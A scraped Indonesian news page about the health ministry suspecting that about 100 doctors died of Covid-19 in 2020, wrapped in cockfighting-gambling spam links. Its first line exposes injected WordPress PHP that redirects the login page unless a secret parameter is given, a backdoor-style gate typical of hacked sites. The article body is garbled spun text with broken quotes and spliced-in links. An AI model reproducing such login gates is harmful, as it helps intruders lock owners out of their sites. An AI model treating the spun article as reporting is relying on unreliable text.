//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Kementerian Kesehatan mencurigai ratusan dokter telah meninggal karena Covid-19 | adu ayam bali_s128.net login_s128.live

Kementerian Kesehatan mencurigai ratusan dokter telah meninggal karena Covid-19

Laporan wartawan Tribunnews.com Rina Ayu-Jakarta TRIBUNNEWS.COM-Ikatan Dokter Indonesia (IDI) menyebutkan, hingga Senin (31 Agustus 2020), 100 dokter meninggal dunia akibat Covid -19. Kementerian Kesehatan RI mencurigai 100 tenaga medis tersebut tidak hanya tertular saat merawat pasien, tapi juga akibat aktivitas di luar rumah sakit.

Achmad Yurianto, Direktur Biro Pencegahan dan Pengendalian Penyakit, mengungkapkan hal tersebut. Dalam “ Dalam 6 bulan Covid-19 di Indonesia, kapan akan berakhir? Kamis (2020/9/09).

“Kami menganalisis suatu masalah secara obyektif. Ternyata banyak orang tidak hanya karena kemampuan kerja, pekerjaannya (misalnya sebagai dokter, perawat atau katanya:” Tenaga medis lainnya ), karena fungsi sosialnya, petugas kesehatan juga merupakan orang biasa yang melakukan kegiatan sosial. “Baca: Anak-anak masih bisa divaksinasi saat pandemi, Achmad Yurianto menjelaskan mekanismenya – Baca: KawalCovid-19: Indonesia Masih Pandemi Pada tahap awal bac: Pakar epidemiologi pengguna antarmuka memprediksi jumlah kasus Covid-19 di Indonesia akan terus meningkat hingga tahun 2021-Yurianto yang mewakili pemerintah sangat penting dalam menangani pandemi Covid-19. Kematian ratusan dokter dan petugas kesehatan dalam wabah tersebut menyatakan belasungkawa.

“Kami tahu bahwa banyak petugas kesehatan telah kehilangan nyawa mereka. Kami berduka. Kami sangat sedih dan kami merasakan kehilangan yang sangat besar,” kata mantan juru bicara Covid-19. Dari sakit. Yuri Anto menjelaskan: “Tidak hanya untuk merawatnya, tetapi juga untuk membuatnya tetap sehat.”

Leave a comment

adu ayam bali_s128.net login_s128.live